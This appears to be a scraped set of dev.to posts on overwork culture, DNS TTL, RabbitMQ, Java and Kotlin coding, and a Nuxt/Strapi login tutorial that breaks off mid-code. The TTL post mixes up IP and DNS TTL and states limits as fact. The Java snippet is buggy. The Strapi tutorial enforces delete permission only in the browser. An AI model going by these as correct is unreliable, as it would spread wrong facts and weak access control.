I remember I organized two days die till you code event in the name of an internal hackathon. The idea was to close as many issues as possible, which we received as part of Production Support.
## Why I think about it
I was the one who wanted to grow, the selfish one, I thought it would not impact anyone, but in upcoming years I could see the damage I had done. Suddenly my team and many teams started working more hours, 8 pm was like normal time, no one used to leave.
All team's expectations were at an all-time high, and developers were expected to deliver everything in a short period.
## What I could Have done different
I could have been less selfish. I could have made sure, working more hours would not become a trend. But I did it. I was young, reckless, had so much energy, wanted to solve all issues and make sure I grew faster, which I did, being selfish.
## Why I am sharing this
I can see many developers are following the same trend for different reasons.
* If I stay in the office for more hours, I will get an early promotion to show my manager I work a lot.
* Rings a bell? Yes this is pretty common; by doing this, you make sure the place becomes toxic for people who want to finish the work and leave.
* I worked for 10+ hours as a developer, forcing my team to do the same.
* Yes, actual incident and many managers in India follow this just because they were asked to work 10+ hours daily when they were developers.
## Conclusion
I am not saying dont work for extra hours, and sometimes it happens, and it's almost unavoidable. After leaving that startup, the rule is to say No; if asked to work for extra hours, it paid off more than six years after that startup, and I never worked for more than 8hrs for my employer.
You can do that too, start saying "No" to the unexpected deadline, become less selfish while doing some work. Stop wasting time unnecessarily in the office when no one asks you.
In case you have a similar story, I would love to hear from you; tag me on [Twitter](https://twitter.com/SantoshYadavDev)
| santoshyadavdev |
939,743 | What is DNS TTL (Time To Live)? | What is time-to-live (TTL)? Time-to-live (TTL) is a value for the period of time that a... | 0 | 2021-12-29T17:41:55 | https://dev.to/s3cloudhub/what-is-dns-ttl-time-to-live-g87 | dns, ttl, route53, aws | ## What is time-to-live (TTL)?
Time-to-live (TTL) is a value for the period of time that a packet, or data, should exist on a computer or network before being discarded.
The meaning of TTL, or packet lifetime, depends on the context. For example, TTL is a value in an Internet Protocol (IP) packet that tells a network router when the packet has been in the network too long and should be discarded.
`Here's the full video along with a hands-on demo that's based on TTL (time-to-live)👇👇`
[](https://www.youtube.com/watch?v=QEmjX9OaGyU)
## How Does TTL Work?
TTL's basic function revolves around managing information packets in relation to DNS requests. When one of these packets is created and transmitted through the internet, there is a chance that it will pass, continuously, from router to router forever. To prevent this from happening, each packet has a specific TTL or hop limit. It is also possible to examine the TTL log of a data packet to obtain information on how it has moved through the internet over the course of its travels.
Within each packet, there is a specified place where the TTL value is stored. This is a numerical value, and it indicates how much longer the packet should move around the internet. When a router receives a data packet, it takes away one unit from the TTL count before sending it on to the next destination within the network. This continues to happen until the TTL count within the packet drops all the way down to zero.
## What is time-to-live in HTTP?
In Hypertext Transfer Protocol (HTTP), time-to-live describes the number of seconds it takes for cached web content to return before the webserver has to check again to ensure that the content is "fresh."
Settings on the webserver define a default value. Still, cache-control tags, which define the kinds of servers, if any, can cache the data, or expired tags, which represent a date and time when the content is stale, can override it in the HyperText Markup Language page headers.
## What Are TTL Values?
When you set TTL values for your website, you choose a value in seconds. For example, a TTL value of 600 is the equivalent of 600 seconds or ten minutes.
The minimum available TTL is usually 30, equivalent to 30 seconds. You could theoretically set a TTL as low as one second. However, most sites use a default TTL of 3600 (one hour). The maximum TTL that you can apply is 86,400 (24 hours).
Technically, you can set any TTL value between the minimum and maximum parameters. Later in this article, we’ll discuss how you can choose the best time to live value for your site.
## How Should You Choose a TTL?
Deciding on a suitable TTL for your needs can be challenging. Fortunately, there are some general guidelines that you can follow to see what fits your site best.
We recommend a TTL of 1-24 hours for most sites. Remember that TTL values are measured in seconds, so this is the equivalent of 3,600 to 86,400 seconds.
This TTL value can reduce loading time, which improves the user experience for your visitors and can decrease your bounce rate. The longer the better is a general rule, but remember to schedule any website maintenance accordingly.
---
▬▬▬▬▬▬ WANT TO LEARN MORE? ▬▬▬▬▬▬
Full Terraform tutorial ► [https://bit.ly/2GwK8V2](https://bit.ly/2GwK8V2)
DevOps Tools, like Ansible ► [https://bit.ly/3iASHuP](https://bit.ly/3iASHuP)
Docker Tutorial ► [https://bit.ly/3iAT9Jx](https://bit.ly/3iAT9Jx) | s3cloudhub |
1,414,198 | O que é RabbitMQ e qual sua função na programação? | RabbitMQ é um software de mensageria de código aberto que permite que aplicativos se comuniquem uns... | 0 | 2023-03-25T00:59:41 | https://dev.to/gabrielgcj/o-que-e-rabbitmq-e-qual-sua-funcao-na-programacao-468j | RabbitMQ é um software de mensageria de código aberto que permite que aplicativos se comuniquem uns com os outros usando filas de mensagens. Ele foi originalmente desenvolvido em Erlang pela Rabbit Technologies Ltd. e agora é mantido pela Pivotal Software, Inc.
As mensagens em RabbitMQ são enviadas para filas e consumidas por aplicativos. Os aplicativos podem produzir ou consumir mensagens. Um produtor é um aplicativo que envia mensagens para a fila, enquanto um consumidor é um aplicativo que recebe mensagens da fila.
Existem quatro componentes principais em RabbitMQ:
1- O **produtor**
2- A **fila**
3- O **exchange**
4- O **consumidor**
O produtor envia mensagens para o exchange, que as encaminha para a fila. O consumidor recebe as mensagens da fila. Existem diferentes tipos de exchanges que determinam como as mensagens são roteadas para as filas.
**O que é um exchange?**
Um exchange no RabbitMQ é um componente fundamental da arquitetura de mensagens do RabbitMQ. É responsável por rotear as mensagens recebidas de um produtor para uma ou mais filas de consumidores.
Quando um produtor envia uma mensagem para o RabbitMQ, ele especifica o nome do exchange e uma chave de roteamento. O exchange, por sua vez, usa a chave de roteamento para determinar qual fila ou filas de consumidores devem receber a mensagem.
Existem quatro tipos de exchanges no RabbitMQ:
**Direct**: roteia mensagens para uma fila com base em uma chave de roteamento exata definida pelo produtor.
**Topic**: roteia mensagens para filas com base em padrões de chave de roteamento, permitindo que as mensagens sejam entregues a várias filas que correspondem ao padrão.
**Headers**: roteia mensagens para filas com base em atributos da mensagem, definidos pelo produtor, como tipo de conteúdo ou código de idioma.
**Fanout**: roteia mensagens para todas as filas que estão vinculadas ao exchange.
Os exchanges são criados e configurados por administradores do RabbitMQ, geralmente por meio de um cliente de linha de comando ou interface gráfica. As filas de consumidores são vinculadas a um exchange, permitindo que as mensagens sejam entregues de forma confiável aos seus destinatários.
O RabbitMQ é altamente escalável e pode lidar com grandes volumes de mensagens. Ele suporta vários protocolos de mensagens, incluindo:
**AMQP** (Advanced Message Queuing Protocol)
**MQTT** (Message Queuing Telemetry Transport)
**STOMP** (Simple Text Oriented Messaging Protocol)
Além disso, o RabbitMQ oferece recursos de segurança, como autenticação e autorização de usuários.
O RabbitMQ é amplamente utilizado em aplicativos distribuídos e em nuvem para comunicação entre microserviços. Ele também é usado em sistemas de processamento de dados em tempo real e em aplicativos de IoT (Internet das Coisas). O RabbitMQ é popular em linguagens de programação como Java, Python e Ruby.
Em resumo, RabbitMQ é uma tecnologia de mensageria escalável e flexível que permite que os aplicativos se comuniquem de maneira eficiente e segura. Ele é amplamente utilizado em aplicativos distribuídos e em nuvem, bem como em sistemas de processamento de dados em tempo real e aplicativos de IoT. O RabbitMQ oferece bibliotecas de cliente para várias linguagens de programação e recursos avançados para personalização e escalabilidade.
| gabrielgcj | |
956,943 | java traditional method to remove duplicate String | I just saw a post in dev someone solved same problem using collections in java. so i thought let me... | 0 | 2022-01-16T05:09:07 | https://dev.to/riyas07/java-core-method-to-remove-duplicate-string-6o8 | java, beginners, programming, tutorial | I just saw a post in dev someone solved same problem using collections in java. so i thought let me try the same problem to solve in traditional way`
1. public class Main
{
public static void main(String[] args) {
String s="abbvcddgtttt";
char c[]=s.toCharArray();
char cc[]=new char[c.length];
int index=0;
char same=' ';
for(int i=0;i<c.length;i++)
{
for(int j=i+1;j<c.length;j++)
{
if(c[i]==c[j])
{
c[i]=' ';
}
}
if(c[i]!=' ')
{
cc[index]=c[i];
index++;
}
}
for(char i:cc)
{
System.out.println(i);
}
}
}
| riyas07 |
994,795 | Avoiding Stringly-typed in Kotlin | A couple of years ago, I developed an application in Kotlin based on Camunda BPMN to help me manage... | 0 | 2022-02-20T16:53:35 | https://blog.frankel.ch/avoid-stringly-typed-kotlin/ | kotlin, typesystem, strongtyping, api | A couple of years ago, I developed an application in Kotlin based on Camunda <abbr title="Business Process Management Notation">BPMN</abbr> to help me manage my conference submission workflow. It tracks my submissions in Trello and synchronizes them on Google Calendar and in a Google Sheet. Google Calendar offers a REST API. As REST APIs go, it's cluttered with `String` everywhere. Here's an excerpt of the code:
```kotlin
fun execute(color: String, availability: String) {
findCalendarEntry(client, google, execution.conference)?.let {
it.colorId = color // 1
it.transparency = availability // 2
client.events()
.update(google.calendarId, it.id, it).execute()
}
}
```
1. Set the event's color. Valid values are "0", "1", ... to "11"
2. Set the event's availability. Valid values are `"transparent"` and `"opaque"`
However, my experience has taught me to favor strong typing. I also want to avoid typos. I want to list some alternatives to using `String` in this post.
## Constants
The oldest trick in the book, available in most languages, is to define constants. Before Java 5, developers used this alternative *a lot* as it was the only one available. It would look like this:
```kotlin
const val Default = "0"
const val Blue = "1"
const val Green = "2"
const val Free = "transparent"
const val Busy = "opaque"
```
We can now call the function accordingly:
```kotlin
execute(Blue, Busy)
```
Constants help with typos. The flip side is that they cannot enforce strong typing:
```kotlin
execute(Blue, Red) // 1
execute(Free, Red) // 2
```
1. Pass two colors, but the compiler is fine
2. Invert the arguments; the compiler is still fine
## Type aliases
The idea behind type aliases is to alias the name of an existing type to something more meaningful.
```kotlin
typealias Color = String
typealias Availability = String
```
With this, we can change the signature of the function:
```kotlin
fun execute(color: Color, availability: Availability) {
// ...
}
```
Unfortunately, type aliases are just cosmetic. Whatever the alias, a `String` stays a `String`. We can still write incorrect code:
```kotlin
execute(Blue, Red) // 1
execute(Free, Red) // 1
```
1. Nothing has improved
## Enumerations
Whether in Java or Kotlin, enumerations are the first step toward strong typing. I believe most developers know about them. Let's change our code to use enums:
```kotlin
enum class Color(val id: String) {
Default("0"),
Blue("1"),
Green("2"),
}
enum class Availability(val value: String) {
Free("transparent"),
Busy("opaque"),
}
```
We need to change the function accordingly, both the signature and the implementation:
```kotlin
fun execute(color: Color, availability: Availability) {
findCalendarEntry(client, google, execution.conference)?.let {
it.colorId = color.id // 1
it.transparency = availability.value // 1
client.events()
.update(google.calendarId, it.id, it).execute()
}
}
```
1. Extract the value wrapped by the `enum`
The usage of enumerations enforces strong-typing:
```kotlin
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Red) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
## Inline classes
A recent Kotlin feature is fully dedicated to strong typing: inline classes. An inline class wraps a single "primitive" value, such as `Int` or `String`. Picture the following class:
```kotlin
data class Person(givenName: String, familyName: String)
```
Callers of this class would have to remember whether the first parameter is the given name or the family name. Kotlin already helps by allowing named parameters:
```kotlin
val p = Person(givenName = "John", familyName = "Doe")
```
However, we can improve the snippet above by wrapping the `String` in two different value types, one for each role.
```kotlin
@JvmInline value class GivenName(value: String)
@JvmInline value class FamilyName(value: String)
val p = Person(GivenName("John"), FamilyName("Doe"))
```
At this point, one cannot swap a given name for a family name, or _vice versa_. Likewise, we can use value classes in our example and define possible values in a companion object.
```kotlin
@JvmInline
value class Color(val id: String) {
companion object {
val Default = Color("0")
val Blue = Color("1")
val Green = Color("2")
}
}
@JvmInline
value class Availability(val value: String) {
companion object {
val Free = Availability("transparent")
val Busy = Availability("opaque")
}
}
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Red) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
## Sealed classes
Sealed classes are another possible way to enforce strong typing. The limitation is we need to define all subclasses of a sealed class in the same package. There can't be any inheritance by third parties. In effect, it makes the class `open` for your code and `final` for client code.
Instead of defining a type and several instances of it as in value classes, we define the different types directly.
```kotlin
sealed class Color(val id: String) {
object Default: Color("0")
object Blue: Color("1")
object Green: Color("2")
}
sealed class Availability(val value: String) {
object Free : Availability("transparent")
object Busy : Availability("opaque")
}
execute(Color.Blue, Availability.Busy) // 1
execute(Color.Blue, Color.Red) // 2
execute(Availability.Free, Color.Blue) // 2
```
1. Compile
2. Doesn't compile!
Note that I defined the objects in their respective parent classes. Depending on your context, you may want to make them top-level instead.
```kotlin
sealed class Color(val id: String)
object Default: Color("0")
object Blue: Color("1")
object Green: Color("2")
sealed class Availability(val value: String)
object Free : Availability("transparent")
object Busy : Availability("opaque")
execute(Blue, Busy)
```
## Conclusion
Kotlin offers several options to enforce strong typing on one's APIs: enumerations, value classes, and sealed classes.
While most developers are pretty comfortable with enumerations, I'd advise considering value and sealed classes as they bring additional benefits to the table.
**To go further:**
* [Enum classes](https://kotlinlang.org/docs/enum-classes.html)
* [Inline classes](https://kotlinlang.org/docs/inline-classes.html)
* [Sealed classes](https://kotlinlang.org/docs/sealed-classes.html)
_Originally published at [A Java Geek](https://blog.frankel.ch/avoid-stringly-typed-kotlin/) on February 20<sup>nd</sup>, 2022_
| nfrankel |
1,000,995 | Day-15 Training at cognizant
| Date:25/02/2022 Day:Friday | 0 | 2022-02-25T06:13:53 | https://dev.to/mahin_mittal_/day-15-training-at-cognizant-1e3 | beginners, mysql | - Date:25/02/2022
- Day:Friday
| mahin_mittal_ |
1,005,407 | How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt Application | Author: Alex Godwin How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt... | 0 | 2022-03-01T15:55:10 | https://strapi.io/blog/how-to-use-the-nuxt-strapi-module-to-add-authentication-to-a-nuxt-application?utm_source=dev.to&utm_medium=post&utm_id=blog | nuxtjs, javascript, tutorial, jamstack | ---
canonical_url: https://strapi.io/blog/how-to-use-the-nuxt-strapi-module-to-add-authentication-to-a-nuxt-application?utm_source=dev.to&utm_medium=post&utm_id=blog
---
Author: Alex Godwin
# How to use the @nuxtjs/strapi Module to add Authentication to a Nuxt Application
In this tutorial, we will learn about authentication (local authentication) in Strapi. We’ll create a simple blog app where authenticated users can create, read, and delete posts. In contrast, unauthenticated users can only view a list of posts but cannot read, create, or delete posts. We’ll have a login route, signup route, and a create post route where users can create posts from. We’ll also be working with Image uploads to see how users can upload images from the Nuxt.js frontend to our Strapi backend.
## What do you need for this tutorial?
- Basic Knowledge of [V](https://vue.js.org)[ue.j](https://vue.js.org)
- Knowledge of JavaScript, and
- [Node.js](https://nodejs.org) (v14 recommended for strapi).
## Table of Contents
- [Installing Strapi](http://strapi.io)
- Building the API with Strapi
- [Installing Nuxt.js](http://nuxtjs.org)
- [Installing](http://https://strapi.nuxt.js.org) [@nuxtjs/strapi](http://https://strapi.nuxt.js.org)
- Building the frontend with Nuxt.js
Here’s what we’ll be building:




Let’s get started!
## Installing Strapi
[T](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[he Strapi documentation](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[says that Strapi is a flexible, open-source](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[,](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[h](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[eadless CMS that gives developers the freedom to choose their favo](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[u](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[rite tools and frameworks](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [and allows](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [editors to](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[manage and distribute their content](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) [easily](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html)[.](https://docs.strapi.io/developer-docs/latest/getting-started/introduction.html) Strapi enables the world's largest companies to accelerate content delivery while building beautiful digital experiences by making the admin panel and API extensible through a plugin system.
Strapi helps us build an API quickly with no hassle of creating a server from scratch. With Strapi, we can do everything literally, and it’s easily customizable. We can add our code and edit functionalities easily. Strapi is amazing, and its capabilities would leave you stunned.
Strapi provides an admin panel to edit and create APIs. It also provides easily-editable code and uses JavaScript.


[To install Strapi, head over to the S](https://strapi.io/documentation/developer-docs/latest/installation/cli.html)[trapi](https://strapi.io/documentation/developer-docs/latest/installation/cli.html) [docs at Strapi](https://strapi.io/documentation/developer-docs/latest/installation/cli.html) and run the following commands:
```shell
yarn create strapi-app my-project //using yarn
npx create-strapi-app@latest my-project //using npx
```
Replace `my-project` with the name you wish to call your application directory. Your package manager will create a directory with the specified name and install Strapi.
If you followed the instructions correctly, you should have Strapi installed on your machine. Run the following command:
```shell
yarn develop //using yarn
npm run develop //using npm
```
To start our development server, Strapi starts our app on http://localhost:1337/admin.
# Building the API with Strapi
We have Strapi up and running; the next step is to create our products content-type.
1. To Create the Article Content Type
- Click on `content-type` builder in the side menu.
- Under `Collection-types`, click `create new collection type`.
- Add new content-type named article.
- Create fields under article content-type.
- Name as short text
- Description as short text
- content as rich text
- Image as a single type.

2. Add User Relationship
- Create a relation field under article.
- Select `User` (from users-permissions-user), and click on “user has many articles” relation.
- Save the article content type.

3. Create User and Enable User Permission and Roles
- Strapi provides a Users collection type by default. Head to `settings` on the side menu, and select `Roles` under `Users and Permissions Plugin`.
- Click on `Authenticated` and check all permissions.
- Save your changes, then go back and click on `public`.
- Check only the `find` and `findOne` permissions.
- Click `save` to save changes.
- Create a user called `author` with whatever credentials you’d like, but select the authenticated role and enable email confirmation.
- Create an article and select `Users_permissions_user` as author. This means that the user `author` created the article.
- Save the article and proceed.
Save the `content-types`. We can now view our API in JSON format when we visit [http://localhost:1337/api/articles](http://localhost:1337/api/articles).
Now that we’ve created our Strapi API, we need to build our frontend with Nuxt.js.
## Installing Nuxt.js
[To install Nuxt.js](https://nuxtjs.org/docs/2.x/get-started/installation)[,](https://nuxtjs.org/docs/2.x/get-started/installation) [visit the Nuxt docs.](https://nuxtjs.org/docs/2.x/get-started/installation)
We want to use Nuxt in SSR mode and server hosting; we also want Tailwind CSS as our preferred CSS framework. Select those and whatever options you want for the rest. Preferably, leave out C.I, commit-linting, and style-linting.
- To install Nuxt.js, run the following commands:
```shell
yarn create nuxt-app <project-name> //using yarn
npx create-nuxt-app <project-name> //using npx
npm init nuxt-app <project-name> //using npm
```
It will ask you some questions (Name, Nuxt Options, UI Framework, TypeScript, Linter, Testing Framework, etc.).
Once all the questions are answered, the dependencies will be installed. The next step is to navigate to the project folder and launch it using the command below.
```shell
yarn dev //using yarn
npm run dev //using npm
```
We should have Nuxt running on [http://localhost:3000](http://localhost:3000).
## Installing @nuxtjs/strapi
We need to query our Strapi backend API, and Strapi provides a great package for that. We could use [Nuxt’s native @nuxtjs/http module](http://https://http.nuxtjs.org) or [axios](https://www.npmjs.com/package/axios) to query our API, but [@nuxtjs/strapi](https://strapi.nuxtjs.org) makes it easier. To install @nuxtjs/strapi:
- Run the command below:
```shell
yarn add @nuxtjs/strapi@^0.3.4 //using yarn
npm install @nuxtjs/strapi@^0.3.4 //using npm
```
- Open the `nuxt.config.js` file and add the following code to the file.
```js
modules: [
// ...other modules
'@nuxtjs/strapi',
]
strapi: {
url: process.env.STRAPI_URL || `http:localhost:1337/api`,
entities: ['articles'],
}
```
We can now use @nuxtjs/strapi to make API calls and continue building our pages and components.
[The @nuxtjs/strapi documentation can be found](https://strapi.nuxtjs.org/) [here.](http://https://strapi.nuxtjs.org/)
- We’ll be using @nuxtjs/strapi in two ways:
this.$strapi() //from properties such as methods, data, computed
$strapi() //from nuxtjs lifecycle methods
## Installing [@nuxtjs/markdownit](https://www.npmjs.com/package/@nuxtjs/markdownit)
Strapi rich text gives us the privilege of writing markdown in our content. In order to parse the markdown content from the backend, we need to [install the @nuxtjs/markdownit package](https://www.npmjs.com/package/@nuxtjs/markdownit).
- Run the command below.
```shell
yarn add @nuxtjs/markdownit //using yarn
npm install @nuxtjs/markdownit //using npm
```
- Add the following lines of code to your nuxt.config.js file.
```js
modules: [
//...other modules
'@nuxtjs/markdownit'
],
markdownit: {
preset: 'default',
linkify: true,
breaks: true,
injected: true,
// use: ['markdown-it-div', 'markdown-it-attrs'],
},
```
Now, we can use @nuxtjs/markdownit to parse our markdown content. [The @nuxtjs/markdownit documentation can be found](https://www.npmjs.com/package/@nuxtjs/markdownit) [here.](http://https://www.npmjs.com/package/@nuxtjs/markdownit)
## Building the Frontend with NuxtJs
We can proceed with building the user-interface of our blog app.
**To Build the Signup Page:**
- Execute the following lines of code to create a `signup.vue` file in the pages directory.
```shell
cd pages
touch signup.vue
```
- Fill signup.vue with the following lines of code.
```vue
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12">
<div v-show="error !== ''" class="p-3 border">
<p>{{ error }}</p>
</div>
<h1 class="font-bold text-2xl md:text-4xl mt-5">Signup</h1>
<form @submit="createUser">
<div>
<input
v-model="email"
class="p-3 my-5 border w-full"
type="email"
placeholder="email"
/>
</div>
<div>
<input
v-model="username"
class="p-3 my-5 border w-full"
type="text"
placeholder="username"
/>
</div>
<div>
<input
v-model="password"
class="p-3 my-5 border w-full"
type="password"
placeholder="password"
/>
</div>
<div>
<button
class="button--green"
:disabled="email === '' || password === '' || username === ''"
type="submit"
>
Signup
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
email: '',
username: '',
password: '',
error: '',
}
},
methods: {
async createUser(e) {
e.preventDefault()
try {
const newUser = await this.$strapi.register({
email: this.email,
username: this.username,
password: this.password,
})
console.log(newUser)
if (newUser !== null) {
this.error = ''
this.$nuxt.$router.push('/articles')
}
} catch (error) {
this.error = error.message
}
},
},
middleware: 'authenticated',
}
</script>
<style></style>
```
We just built our signup logic; when users provide their email, username and password, and click the signup button, we invoke the `createUser` method. All we’re doing in this method is registering a new user using the `@nuxtjs/strapi` module i.e `this.$strapi.register()` method. Then, we redirect the user to the `/articles` route. If the email belongs to an existing user, an error message is displayed at the top of the page. Finally, we’re using `nuxtjs middleware` feature to invoke a custom-made `middleware` that we’re going to create.
**To Build the Login Page**
- Execute the following lines of code to create a `login.vue` file in the pages directory.
```vue
touch login.vue
```
- Fill up login.vue with the following lines of code.
```vue
<template>
<div class="w-4/5 mx-auto md:w-1/2 text-center my-12">
<div v-show="error !== ''" class="p-3 border">
<p>{{ error }}</p>
</div>
<h1 class="font-bold text-2xl md:text-4xl mt-5">Login</h1>
<form @submit="loginUser">
<div>
<input
v-model="identifier"
class="p-3 my-5 border w-full"
type="email"
placeholder="email"
/>
</div>
<div>
<input
v-model="password"
class="p-3 my-5 border w-full"
type="password"
placeholder="password"
/>
</div>
<div>
<button
:disabled="identifier === '' || password === ''"
class="button--green"
type="submit"
>
Login
</button>
</div>
</form>
</div>
</template>
<script>
export default {
data() {
return {
identifier: '',
password: '',
error: '',
}
},
methods: {
async loginUser(e) {
e.preventDefault()
try {
const user = await this.$strapi.login({
identifier: this.identifier,
password: this.password,
})
console.log(user)
if (user !== null) {
this.error = ''
this.$nuxt.$router.push('/articles')
}
} catch (error) {
this.error = 'Error in login credentials'
}
},
},
middleware: 'authenticated',
}
</script>
<style></style>
```
We’ve just built our login logic; users provide a unique identifier (email) and password, then click on the login button, which calls the loginUser method. This method attempts to log the user in using the @nuxtjs/strapi module i.e this.$strapi.login() method and returns a user object if a user is found or an error if the credentials are invalid. The user is redirected to the `/article` route if the process was successful and an error message is displayed if an error occurred.
**To Create an Authenticated Middleware**
Let’s create our middleware function:
- Execute the following lines of code to create an authenticated.js file in the middleware directory.
```shell
cd middleware
touch authenticated.js
```
- Fill up authenticated.js with the following code.
```js
export default function ({ $strapi, redirect }) {
if ($strapi.user) {
redirect('/articles')
}
}
```
What we have done is set up a middleware that checks if a user is logged in or not. If a user is logged in, we redirect them to the `/articles` page, this middleware is useful for preventing a logged in user from accessing the Login, Signup and ‘/’ route. We don’t want to have a logged in user signing up on our app for whatsoever reason.
**To Build the Nav Component**
- Execute the following lines of code to create a `Nav.vue` file in the components directory.
```shell
cd components
touch Nav.vue
```
- Fill up the file with the following code.
```js
<template>
<div
class="flex space-x-5 items-center justify-center bg-black text-white py-3 sm:py-5"
>
<NuxtLink to="/articles">Articles</NuxtLink>
<div v-if="$strapi.user === null">
<NuxtLink class="border-r px-3" to="/login">Login</NuxtLink>
<NuxtLink class="border-r px-3" to="/signup">Signup</NuxtLink>
</div>
<div v-if="$strapi.user !== null">
<span class="border-r px-3">{{ $strapi.user.username }}</span>
<NuxtLink class="border-r px-3" to="/new">Create Post</NuxtLink>
<button class="pl-3" @click="logout">Logout</button>
</div>
</div>
</template>
<script>
export default {
name: 'Nav',
methods: {
async logout() {
await this.$strapi.logout()
this.$nuxt.$router.push('/')
},
},
}
</script>
<style></style>
```
In the *Nav* component, all we’re doing is building a navigation bar for our application. Using the @nuxt/strapi module, we’re checking if there is no logged in user, then we display signup and login optiona in the nav bar. But if a user is logged in, we display their username, logout option and a “create post” link.
Note:
```
$strapi.user //returns the loggedin user or null
```
When a user clicks the logout button, we invoke a logout function, which in turn invokes the $`strapi.logout()` function that logs the user out. Then, we redirect the user to the `'``/``'` route using the `$nuxt.$router.push()` method.
**To Build the Homepage**
- Execute the following lines of code to create an `index.vue` file in the pages directory.
```shell
cd pages
code index.vue
```
- Fill up the index.vue file with the following code.
```js
<template>
<div class="container">
<div>
<h1 class="title">Welcome To The BlogApp</h1>
<div class="links">
<NuxtLink to="/login" class="button--green"> Login </NuxtLink>
<NuxtLink to="/articles" class="button--grey"> Continue Free </NuxtLink>
</div>
</div>
</div>
</template>
<script>
export default {
middleware: 'authenticated',
}
</script>
<style>
/* Sample `apply` at-rules with Tailwind CSS
.container {
@apply min-h-screen flex justify-center items-center text-center mx-auto;
}
*/
.container {
margin: 0 auto;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
text-align: center;
}
.title {
font-family: 'Quicksand', 'Source Sans Pro', -apple-system, BlinkMacSystemFont,
'Segoe UI', Roboto, 'Helvetica Neue', Arial, sans-serif;
display: block;
font-weight: 300;
font-size: 80px;
color: #35495e;
letter-spacing: 1px;
}
.subtitle {
font-weight: 300;
font-size: 42px;
color: #526488;
word-spacing: 5px;
padding-bottom: 15px;
}
.links {
padding-top: 15px;
}
</style>
```
What we have here is our homepage. We’re using Nuxt.js middleware feature to invoke a custom-made middleware that we created.
**To Build the Articles Page**
- Execute the following lines of code to create a articles.vue file in the pages directory.
```shell
cd pages
touch articles.vue
```
- Fill it up with the following code.
```js
<template>
<div>
<Nav class="mx-auto sticky top-0" />
<h1 class="text-center my-5">All our articles</h1>
<div
v-show="error !== ''"
class="sticky z-100 border p-5 m-3 top-0 bg-black text-white text-center mx-auto w-4/5 sm:w-4/5 md:w-4/5 lg:w-1/2"
>
<p class="m-1 sm:m-3">{{ error }}</p>
<button class="button--grey" @click="resetError()">Ok</button>
</div>
<div
v-for="(article, i) in data.data"
:key="i"
class="sm:flex sm:space-x-5 my-5 shadow-lg mx-auto w-4/5 sm:w-4/5 md:w-4/5 lg:w-1/2"
>
<img
:src="`http://localhost:1337${article.attributes.Image.data.attributes.formats.small.url}`"
class="max-h-screen sm:h-48"
/>
<div class="px-2 sm:pr-2 sm:text-left text-center">
<h3 class="font-bold my-3">{{ article.attributes.name }}</h3>
<p class="my-3">{{ article.attributes.description }}</p>
<button class="button--green mb-4 sm:mb-0" @click="readPost(article)">
Read more
</button>
</div>
</div>
</div>
</template>
<script>
export default {
async asyncData({ $strapi, $md }) {
const data = await $strapi.$articles.find({ populate: '*' })
return { data }
},
data() {
return {
error: '',
}
},
methods: {
readPost(article) {
if (this.$strapi.user) {
this.error = ''
this.$nuxt.$router.push(`/article/${article.id}`)
} else {
this.error = 'Please Login to read articles'
}
},
resetError() {
this.error = ''
},
},
}
</script>
<style></style>
```
First, we’ll use the @nuxtjs/strapi module to find all our articles. Then, we’ll display the articles on our page. In the `readPost` method, we’re checking if a user is logged in before allowing the user to read a post. If the user is not logged in, we display an error message saying “Please, log in to read articles.”
**To Build the Article Content Page**
- Execute the following lines of code to create a _id.vue file in the pages directory.
```shell
mkdir article
touch _id.vue
```
- Fill the _id.vue file with the following code.
```js
<template>
<div>
<Nav class="mx-auto sticky top-0" />
<div class="w-4/5 sm:w-1/2 mx-auto my-5">
<h3 class="my-5 font-bold text-4xl">
{{ article.name }}
</h3>
<img
:src="`http://localhost:1337${article.Image.url}`"
class="max-h-screen"
/>
<p class="mt-5 font-bold">
written by {{ article.users_permissions_user.username }}
</p>
<div class="my-5" v-html="$md.render(article.content)"></div>
<button
v-if="
$strapi.user && article.users_permissions_user.id === $strapi.user.id
"
class="button--grey"
@click="deletePost(article.id)"
>
Delete
</button>
</div>
</div>
</template>
<script>
export default {
async asyncData({ $strapi, route }) {
const id = route.params.id
const article = await $strapi.$articles.findOne(id, {
populate: '*',
})
return { article }
},
methods: {
async deletePost(id) {
await this.$strapi.$articles.delete(id)
this.$nuxt.$router.push('/articles')
},
},
middleware({ $strapi, redirect }) {
if ($strapi.user === null) {
redirect('/articles')
}
},
}
</script>
<style scoped>
h1 {
font-weight: 700;
font-size: 2rem;
margin: 0.5em 0;
}
</style>
```
On this page, we’re displaying an individual article with its complete content using markdownit i.e `$md.render(article.content)` , author name, and more. We’ll also display a delete button if the current user is the author of the post; we’ll check for that by using the `@nuxtjs/strapi` module. We don’t want an unauthorized user to delete a post they didn’t create. Finally, in the middleware, we’re checking for a logged in user; if there’s none, we’ll redirect to the ‘/articles’ route, making sure the article content page is totally inaccessible to unauthenticated users.
**NOTE:**
The `Users_permissions` plugin is currently broken, but we can populate the `users_permissions_user` field manually from the Strapi backend. Follow the steps below to do so:
- Navigate to the `src/api/controllers` folder.
- Click on the `article.js` file.
- Fill it up with the following code.
```js
'use strict';
/**
* article controller
*/
const { createCoreController } = require('@strapi/strapi').factories;
module.exports = createCoreController('api::article.article', ({ strapi }) => ({
async findOne(ctx) {
